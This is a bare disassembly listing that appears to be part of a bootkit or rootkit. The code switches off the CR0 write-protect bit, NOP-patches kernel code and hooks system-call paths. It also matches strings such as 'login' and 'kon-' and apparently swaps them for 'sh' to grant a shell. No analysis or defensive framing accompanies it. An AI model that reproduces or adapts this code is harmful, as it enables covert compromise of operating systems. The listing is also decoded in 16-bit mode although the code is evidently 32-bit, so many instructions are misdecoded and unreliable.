00000C54  8BC6              mov ax,si
00000C56  83C040            add ax,byte +0x40
00000C59  89859102          mov [di+0x291],ax
00000C5D  0000              add [bx+si],al
00000C5F  57                push di
00000C60  8BB58002          mov si,[di+0x280]
00000C64  0000              add [bx+si],al
00000C66  56                push si
00000C67  8DBD8402          lea di,[di+0x284]
00000C6B  0000              add [bx+si],al
00000C6D  B90500            mov cx,0x5
00000C70  0000              add [bx+si],al
00000C72  F3A4              rep movsb
00000C74  5E                pop si
00000C75  6A07              push byte +0x7
00000C77  59                pop cx
00000C78  8DBDEB01          lea di,[di+0x1eb]
00000C7C  0000              add [bx+si],al
00000C7E  F3A4              rep movsb
00000C80  8BB57C02          mov si,[di+0x27c]
00000C84  0000              add [bx+si],al
00000C86  89B58902          mov [di+0x289],si
00000C8A  0000              add [bx+si],al
00000C8C  5F                pop di
00000C8D  57                push di
00000C8E  8DB57B01          lea si,[di+0x17b]
00000C92  0000              add [bx+si],al
00000C94  B91A01            mov cx,0x11a
00000C97  0000              add [bx+si],al
00000C99  F3A4              rep movsb
00000C9B  5F                pop di
00000C9C  8B858002          mov ax,[di+0x280]
00000CA0  0000              add [bx+si],al
00000CA2  C600E8            mov byte [bx+si],0xe8
00000CA5  2BF8              sub di,ax
00000CA7  83EF05            sub di,byte +0x5
00000CAA  897801            mov [bx+si+0x1],di
00000CAD  C3                ret
00000CAE  9C                pushfw
00000CAF  60                pushaw
00000CB0  BE0000            mov si,0x0
00000CB3  1000              adc [bx+si],al
00000CB5  837C2424          cmp word [si+0x24],byte +0x24
00000CB9  007502            add [di+0x2],dh
00000CBC  8BF5              mov si,bp
00000CBE  E80000            call word 0xcc1
00000CC1  0000              add [bx+si],al
00000CC3  5D                pop bp
00000CC4  33DB              xor bx,bx
00000CC6  33D2              xor dx,dx
00000CC8  66813C1EFF1475    cmp dword [si],0x7514ff1e
00000CCF  48                dec ax
00000CD0  807C1E02          cmp byte [si+0x1e],0x2
00000CD4  857541            test [di+0x41],si
00000CD7  817C1E0789        cmp word [si+0x1e],0x8907
00000CDC  44                inc sp
00000CDD  2418              and al,0x18
00000CDF  7537              jnz 0xd18
00000CE1  85D2              test dx,dx
00000CE3  750D              jnz 0xcf2
00000CE5  8DBD6E02          lea di,[di+0x26e]
00000CE9  0000              add [bx+si],al
00000CEB  B8D9FD            mov ax,0xfdd9
00000CEE  FF                db 0xFF
00000CEF  FF                db 0xFF
00000CF0  EB0B              jmp short 0xcfd
00000CF2  8DBDB602          lea di,[di+0x2b6]
00000CF6  0000              add [bx+si],al
00000CF8  B891FD            mov ax,0xfd91
00000CFB  FF                db 0xFF
00000CFC  FF8B4C1E          dec word [bp+di+0x1e4c]
00000D00  03890F55          add cx,[bx+di+0x550f]
00000D04  2BEE              sub bp,si
00000D06  2BEB              sub bp,bx
00000D08  2BE8              sub bp,ax
00000D0A  C6041E            mov byte [si],0x1e
00000D0D  E8896C            call word 0x7999
00000D10  1E                push ds
00000D11  015D85            add [di-0x7b],bx
00000D14  D2                db 0xD2
00000D15  750A              jnz 0xd21
00000D17  42                inc dx
00000D18  43                inc bx
00000D19  81FB4042          cmp bx,0x4240
00000D1D  0F                db 0x0F
00000D1E  007EA7            add [bp-0x59],bh
00000D21  33C0              xor ax,ax
00000D23  8B4C24            mov cx,[si+0x24]
00000D26  2484              and al,0x84
00000D28  C9                leave
00000D29  7405              jz 0xd30
00000D2B  83C028            add ax,byte +0x28
00000D2E  E2FB              loop 0xd2b
00000D30  83C014            add ax,byte +0x14
00000D33  8D842897          lea ax,[si-0x68d8]
00000D37  FD                std
00000D38  FF                db 0xFF
00000D39  FF894424          dec word [bx+di+0x2444]
00000D3D  2461              and al,0x61
00000D3F  9D                popfw
00000D40  C3                ret
00000D41  60                pushaw
00000D42  8B5378            mov dx,[bp+di+0x78]
00000D45  03D6              add dx,si
00000D47  33DB              xor bx,bx
00000D49  8B4A20            mov cx,[bp+si+0x20]
00000D4C  03CE              add cx,si
00000D4E  8B421C            mov ax,[bp+si+0x1c]
00000D51  03C6              add ax,si
00000D53  8B7A18            mov di,[bp+si+0x18]
00000D56  8B6A24            mov bp,[bp+si+0x24]
00000D59  03EE              add bp,si
00000D5B  8B11              mov dx,[bx+di]
00000D5D  03D6              add dx,si
00000D5F  50                push ax
00000D60  53                push bx
00000D61  668B5C5D          mov ebx,[si+0x5d]
00000D65  0081E3FF          add [bx+di-0x1d],al
00000D69  FF00              inc word [bx+si]
00000D6B  008B0498          add [bp+di-0x67fc],cl
00000D6F  03C6              add ax,si
00000D71  E80C00            call word 0xd80
00000D74  0000              add [bx+si],al
00000D76  5B                pop bx
00000D77  58                pop ax
00000D78  83C104            add cx,byte +0x4
00000D7B  43                inc bx
00000D7C  4F                dec di
00000D7D  75DC              jnz 0xd5b
00000D7F  61                popaw
00000D80  C3                ret
00000D81  C3                ret
00000D82  60                pushaw
00000D83  8BD8              mov bx,ax
00000D85  E82400            call word 0xdac
00000D88  0000              add [bx+si],al
00000D8A  8BD0              mov dx,ax
00000D8C  E80000            call word 0xd8f
00000D8F  0000              add [bx+si],al
00000D91  5D                pop bp
00000D92  8DB53201          lea si,[di+0x132]
00000D96  0000              add [bx+si],al
00000D98  8DBD3A01          lea di,[di+0x13a]
00000D9C  0000              add [bx+si],al
00000D9E  83C704            add di,byte +0x4
00000DA1  AD                lodsw
00000DA2  85C0              test ax,ax
00000DA4  7406              jz 0xdac
00000DA6  3BC2              cmp ax,dx
00000DA8  75F4              jnz 0xd9e
00000DAA  891F              mov [bx],bx
00000DAC  61                popaw
00000DAD  C3                ret
00000DAE  51                push cx
00000DAF  53                push bx
00000DB0  52                push dx
00000DB1  33C9              xor cx,cx
00000DB3  33C0              xor ax,ax
00000DB5  33DB              xor bx,bx
00000DB7  40                inc ax
00000DB8  8A0A              mov cl,[bp+si]
00000DBA  84C9              test cl,cl
00000DBC  7407              jz 0xdc5
00000DBE  03C1              add ax,cx
00000DC0  03D8              add bx,ax
00000DC2  42                inc dx
00000DC3  EBF3              jmp short 0xdb8
00000DC5  C1E310            shl bx,0x10
00000DC8  0BC3              or ax,bx
00000DCA  5A                pop dx
00000DCB  5B                pop bx
00000DCC  59                pop cx
00000DCD  C3                ret
00000DCE  9C                pushfw
00000DCF  60                pushaw
00000DD0  E80000            call word 0xdd3
00000DD3  0000              add [bx+si],al
00000DD5  5D                pop bp
00000DD6  81BD02010000      cmp word [di+0x102],0x0
00000DDC  64FF05            inc word [fs:di]
00000DDF  C47448            les si,[si+0x48]
00000DE2  83BD0B0100        cmp word [di+0x10b],byte +0x0
00000DE7  0001              add [bx+di],al
00000DE9  7D38              jnl 0xe23
00000DEB  C7850B010000      mov word [di+0x10b],0x0
00000DF1  0100              add [bx+si],ax
00000DF3  0000              add [bx+si],al
00000DF5  FC                cld
00000DF6  8B7C24            mov di,[si+0x24]
00000DF9  2483              and al,0x83
00000DFB  EF                out dx,ax
00000DFC  058DB5            add ax,0xb58d
00000DFF  0201              add al,[bx+di]
00000E01  0000              add [bx+si],al
00000E03  B90500            mov cx,0x5
00000E06  0000              add [bx+si],al
00000E08  F3A4              rep movsb
00000E0A  8B850F01          mov ax,[di+0x10f]
00000E0E  0000              add [bx+si],al
00000E10  8D7575            lea si,[di+0x75]
00000E13  B97900            mov cx,0x79
00000E16  0000              add [bx+si],al
00000E18  8BF8              mov di,ax
00000E1A  F3A4              rep movsb
00000E1C  50                push ax
00000E1D  FF950701          call word near [di+0x107]
00000E21  0000              add [bx+si],al
00000E23  61                popaw
00000E24  9D                popfw
00000E25  832C24            sub word [si],byte +0x24
00000E28  05C381            add ax,0x81c3
00000E2B  BD0B01            mov bp,0x10b
00000E2E  0000              add [bx+si],al
00000E30  F4                hlt
00000E31  0100              add [bx+si],ax
00000E33  0074BF            add [si-0x41],dh
00000E36  FF850B01          inc word [di+0x10b]
00000E3A  0000              add [bx+si],al
00000E3C  61                popaw
00000E3D  9D                popfw
00000E3E  0000              add [bx+si],al
00000E40  0000              add [bx+si],al
00000E42  0000              add [bx+si],al
00000E44  00830424          add [bp+di+0x2404],al
00000E48  02C3              add al,bl
00000E4A  9C                pushfw
00000E4B  60                pushaw
00000E4C  8B4424            mov ax,[si+0x24]
00000E4F  288B5C24          sub [bp+di+0x245c],cl
00000E53  2C8B              sub al,0x8b
00000E55  4C                dec sp
00000E56  2430              and al,0x30
00000E58  8B7004            mov si,[bx+si+0x4]
00000E5B  33ED              xor bp,bp
00000E5D  668B28            mov ebp,[bx+si]
00000E60  817C2EEC6D        cmp word [si+0x2e],0x6dec
00000E65  007300            add [bp+di+0x0],dh
00000E68  7554              jnz 0xebe
00000E6A  817C2EF076        cmp word [si+0x2e],0x76f0
00000E6F  0031              add [bx+di],dh
00000E71  00754A            add [di+0x4a],dh
00000E74  8B7904            mov di,[bx+di+0x4]
00000E77  8B490C            mov cx,[bx+di+0xc]
00000E7A  83E904            sub cx,byte +0x4
00000E7D  813FB001          cmp word [bx],0x1b0
00000E81  8B4D74            mov cx,[di+0x74]
00000E84  06                push es
00000E85  47                inc di
00000E86  49                dec cx
00000E87  75F4              jnz 0xe7d
00000E89  EB33              jmp short 0xebe
00000E8B  66817FFE9090742B  cmp dword [bx-0x2],0x2b749090
00000E93  0F20C2            mov edx,cr0
00000E96  81E2FFFF          and dx,0xffff
00000E9A  FE                db 0xFE
00000E9B  FF0F              dec word [bx]
00000E9D  22C2              and al,dl
00000E9F  807FFE75          cmp byte [bx-0x2],0x75
00000EA3  7407              jz 0xeac
00000EA5  C747FA9090        mov word [bx-0x6],0x9090
00000EAA  90                nop
00000EAB  90                nop
00000EAC  66C747FE90900F20  mov dword [bx-0x2],0x200f9090
00000EB4  C281CA            ret 0xca81
00000EB7  0000              add [bx+si],al
00000EB9  0100              add [bx+si],ax
00000EBB  0F22C2            mov cr0,edx
00000EBE  61                popaw
00000EBF  9D                popfw
00000EC0  C20C00            ret 0xc
00000EC3  B20A              mov dl,0xa
00000EC5  E491              in al,0x91
00000EC7  2807              sub [bx],al
00000EC9  A5                movsw
00000ECA  42                inc dx
00000ECB  0000              add [bx+si],al
00000ECD  0000              add [bx+si],al
00000ECF  0000              add [bx+si],al
00000ED1  0000              add [bx+si],al
00000ED3  0000              add [bx+si],al
00000ED5  0000              add [bx+si],al
00000ED7  0000              add [bx+si],al
00000ED9  0000              add [bx+si],al
00000EDB  0000              add [bx+si],al
00000EDD  0000              add [bx+si],al
00000EDF  0000              add [bx+si],al
00000EE1  0000              add [bx+si],al
00000EE3  0000              add [bx+si],al
00000EE5  0000              add [bx+si],al
00000EE7  005041            add [bx+si+0x41],dl
00000EEA  4E                dec si
00000EEB  43                inc bx
00000EEC  41                inc cx
00000EED  4B                dec bx
00000EEE  45                inc bp
00000EEF  50                push ax
00000EF0  E80000            call word 0xef3
00000EF3  0000              add [bx+si],al
00000EF5  830424            add word [si],byte +0x24
00000EF8  3358FF            xor bx,[bx+si-0x1]
00000EFB  7424              jz 0xf21
00000EFD  0483              add al,0x83
00000EFF  0424              add al,0x24
00000F01  028F0058          add cl,[bx+0x5800]
00000F05  83C404            add sp,byte +0x4
00000F08  9C                pushfw
00000F09  3DCB00            cmp ax,0xcb
00000F0C  0000              add [bx+si],al
00000F0E  7509              jnz 0xf19
00000F10  60                pushaw
00000F11  E86900            call word 0xf7d
00000F14  0000              add [bx+si],al
00000F16  61                popaw
00000F17  EB14              jmp short 0xf2d
00000F19  83F80B            cmp ax,byte +0xb
00000F1C  750F              jnz 0xf2d
00000F1E  60                pushaw
00000F1F  E85F01            call word 0x1081
00000F22  0000              add [bx+si],al
00000F24  61                popaw
00000F25  EB06              jmp short 0xf2d
00000F27  680000            push word 0x0
00000F2A  0000              add [bx+si],al
00000F2C  C3                ret
00000F2D  9D                popfw
00000F2E  FF14              call word near [si]
00000F30  8500              test [bx+si],ax
00000F32  0000              add [bx+si],al
00000F34  00EB              add bl,ch
00000F36  F050              lock push ax
00000F38  E80000            call word 0xf3b
00000F3B  0000              add [bx+si],al
00000F3D  830424            add word [si],byte +0x24
00000F40  3358FF            xor bx,[bx+si-0x1]
00000F43  7424              jz 0xf69
00000F45  0483              add al,0x83
00000F47  0424              add al,0x24
00000F49  028F0058          add cl,[bx+0x5800]
00000F4D  83C404            add sp,byte +0x4
00000F50  9C                pushfw
00000F51  3DCB00            cmp ax,0xcb
00000F54  0000              add [bx+si],al
00000F56  7509              jnz 0xf61
00000F58  60                pushaw
00000F59  E82100            call word 0xf7d
00000F5C  0000              add [bx+si],al
00000F5E  61                popaw
00000F5F  EB0C              jmp short 0xf6d
00000F61  83F80B            cmp ax,byte +0xb
00000F64  7507              jnz 0xf6d
00000F66  60                pushaw
00000F67  E81701            call word 0x1081
00000F6A  0000              add [bx+si],al
00000F6C  61                popaw
00000F6D  EB06              jmp short 0xf75
00000F6F  680000            push word 0x0
00000F72  0000              add [bx+si],al
00000F74  C3                ret
00000F75  9D                popfw
00000F76  FF14              call word near [si]
00000F78  8500              test [bx+si],ax
00000F7A  0000              add [bx+si],al
00000F7C  00EB              add bl,ch
00000F7E  F033FF            lock xor di,di
00000F81  8B4424            mov ax,[si+0x24]
00000F84  283B              sub [bp+di],bh
00000F86  44                inc sp
00000F87  242C              and al,0x2c
00000F89  0F85F300          jnz word 0x1080
00000F8D  0000              add [bx+si],al
00000F8F  3D7707            cmp ax,0x777
00000F92  0000              add [bx+si],al
00000F94  740C              jz 0xfa2
00000F96  47                inc di
00000F97  3D0903            cmp ax,0x309
00000F9A  0000              add [bx+si],al
00000F9C  0F85E000          jnz word 0x1080
00000FA0  0000              add [bx+si],al
00000FA2  E80000            call word 0xfa5
00000FA5  0000              add [bx+si],al
00000FA7  5D                pop bp
00000FA8  8B4DD2            mov cx,[di-0x2e]
00000FAB  8B815403          mov ax,[bx+di+0x354]
00000FAF  0000              add [bx+si],al
00000FB1  33C9              xor cx,cx
00000FB3  41                inc cx
00000FB4  83F91E            cmp cx,byte +0x1e
00000FB7  0F84C500          jz word 0x1080
00000FBB  0000              add [bx+si],al
00000FBD  66813C0864A175    cmp dword [si],0x75a16408
00000FC4  EE                out dx,al
00000FC5  8B4408            mov ax,[si+0x8]
00000FC8  02648B            add ah,[si-0x75]
00000FCB  0085FF75          add [di+0x75ff],al
00000FCF  52                push dx
00000FD0  C7809C010000      mov word [bx+si+0x19c],0x0
00000FD6  0000              add [bx+si],al
00000FD8  0000              add [bx+si],al
00000FDA  C7808C010000      mov word [bx+si+0x18c],0x0
00000FE0  0000              add [bx+si],al
00000FE2  0000              add [bx+si],al
00000FE4  C780A0010000      mov word [bx+si+0x1a0],0x0
00000FEA  0000              add [bx+si],al
00000FEC  0000              add [bx+si],al
00000FEE  C78090010000      mov word [bx+si+0x190],0x0
00000FF4  0000              add [bx+si],al
00000FF6  0000              add [bx+si],al
00000FF8  C780A4010000      mov word [bx+si+0x1a4],0x0
00000FFE  0000              add [bx+si],al
00001000  0000              add [bx+si],al
00001002  C78094010000      mov word [bx+si+0x194],0x0
00001008  0000              add [bx+si],al
0000100A  0000              add [bx+si],al
0000100C  C780A8010000      mov word [bx+si+0x1a8],0x0
00001012  0000              add [bx+si],al
00001014  0000              add [bx+si],al
00001016  C78098010000      mov word [bx+si+0x198],0x0
0000101C  0000              add [bx+si],al
0000101E  0000              add [bx+si],al
00001020  EB50              jmp short 0x1072
00001022  C780A0020000      mov word [bx+si+0x2a0],0x0
00001028  0000              add [bx+si],al
0000102A  0000              add [bx+si],al
0000102C  C78090020000      mov word [bx+si+0x290],0x0
00001032  0000              add [bx+si],al
00001034  0000              add [bx+si],al
00001036  C780A4020000      mov word [bx+si+0x2a4],0x0
0000103C  0000              add [bx+si],al
0000103E  0000              add [bx+si],al
00001040  C78094020000      mov word [bx+si+0x294],0x0
00001046  0000              add [bx+si],al
00001048  0000              add [bx+si],al
0000104A  C780A8020000      mov word [bx+si+0x2a8],0x0
00001050  0000              add [bx+si],al
00001052  0000              add [bx+si],al
00001054  C78098020000      mov word [bx+si+0x298],0x0
0000105A  0000              add [bx+si],al
0000105C  0000              add [bx+si],al
0000105E  C780AC020000      mov word [bx+si+0x2ac],0x0
00001064  0000              add [bx+si],al
00001066  0000              add [bx+si],al
00001068  C7809C020000      mov word [bx+si+0x29c],0x0
0000106E  0000              add [bx+si],al
00001070  0000              add [bx+si],al
00001072  C744242800        mov word [si+0x24],0x28
00001077  0000              add [bx+si],al
00001079  00C7              add bh,al
0000107B  44                inc sp
0000107C  242C              and al,0x2c
0000107E  0000              add [bx+si],al
00001080  0000              add [bx+si],al
00001082  C3                ret
00001083  E80000            call word 0x1086
00001086  0000              add [bx+si],al
00001088  5D                pop bp
00001089  8BADF1FE          mov bp,[di-0x10f]
0000108D  FF                db 0xFF
0000108E  FF8D7424          dec word [di+0x2474]
00001092  288B1E85          sub [bp+di-0x7ae2],cl
00001096  DB0F              fisttp dword [bx]
00001098  84BC0000          test [si+0x0],bh
0000109C  00817B05          add [bx+di+0x57b],al
000010A0  6C                insb
000010A1  6F                outsw
000010A2  6769755A8B7E      imul si,[ebp+0x5a],word 0x7e8b
000010A8  0483              add al,0x83
000010AA  C704578B          mov word [si],0x8b57
000010AE  7F04              jg 0x10b4
000010B0  8BF7              mov si,di
000010B2  E8A300            call word 0x1158
000010B5  0000              add [bx+si],al
000010B7  5F                pop di
000010B8  83F907            cmp cx,byte +0x7
000010BB  0F8C9800          jl word 0x1157
000010BF  0000              add [bx+si],al
000010C1  813E6B6F6E2D      cmp word [0x6f6b],0x2d6e
000010C7  0F858C00          jnz word 0x1157
000010CB  0000              add [bx+si],al
000010CD  817E047573        cmp word [bp+0x4],0x7375
000010D2  7200              jc 0x10d4
000010D4  0F857F00          jnz word 0x1157
000010D8  0000              add [bx+si],al
000010DA  0F20C2            mov edx,cr0
000010DD  81E2FFFF          and dx,0xffff
000010E1  FE                db 0xFE
000010E2  FF0F              dec word [bx]
000010E4  22C2              and al,dl
000010E6  FC                cld
000010E7  C743057368        mov word [bp+di+0x5],0x6873
000010EC  0000              add [bx+si],al
000010EE  33C0              xor ax,ax
000010F0  AB                stosw
000010F1  AB                stosw
000010F2  0F20C2            mov edx,cr0
000010F5  81CA0000          or dx,0x0
000010F9  0100              add [bx+si],ax
000010FB  0F22C2            mov cr0,edx
000010FE  EB59              jmp short 0x1159
00001100  817B057368        cmp word [bp+di+0x5],0x6873
00001105  0000              add [bx+si],al
00001107  7550              jnz 0x1159
00001109  8B7E04            mov di,[bp+0x4]
0000110C  85FF              test di,di
0000110E  7449              jz 0x1159
00001110  837F0400          cmp word [bx+0x4],byte +0x0
00001114  7443              jz 0x1159
00001116  837F0800          cmp word [bx+0x8],byte +0x0
0000111A  743D              jz 0x1159
0000111C  8B7F08            mov di,[bx+0x8]
0000111F  E83600            call word 0x1158
00001122  0000              add [bx+si],al
00001124  83F907            cmp cx,byte +0x7
00001127  7C30              jl 0x1159
00001129  813F6B6F          cmp word [bx],0x6f6b
0000112D  6E                outsb
0000112E  2D7528            sub ax,0x2875
00001131  817F046669        cmp word [bx+0x4],0x6966
00001136  7800              js 0x1138
00001138  751F              jnz 0x1159
0000113A  0F20C2            mov edx,cr0
0000113D  81E2FFFF          and dx,0xffff
00001141  FE                db 0xFE
00001142  FF0F              dec word [bx]
00001144  22C2              and al,dl
00001146  C743056C6F        mov word [bp+di+0x5],0x6f6c
0000114B  67690F20C2        imul cx,[edi],word 0xc220
00001150  81CA0000          or dx,0x0
00001154  0100              add [bx+si],ax
00001156  0F22C2            mov cr0,edx
00001159  C3                ret
0000115A  33C9              xor cx,cx
0000115C  803C0F            cmp byte [si],0xf
0000115F  007406            add [si+0x6],dh
00001162  41                inc cx
00001163  83F907            cmp cx,byte +0x7
00001166  7CF4              jl 0x115c
00001168  C3                ret


times 9*512-($-$$) db '$'
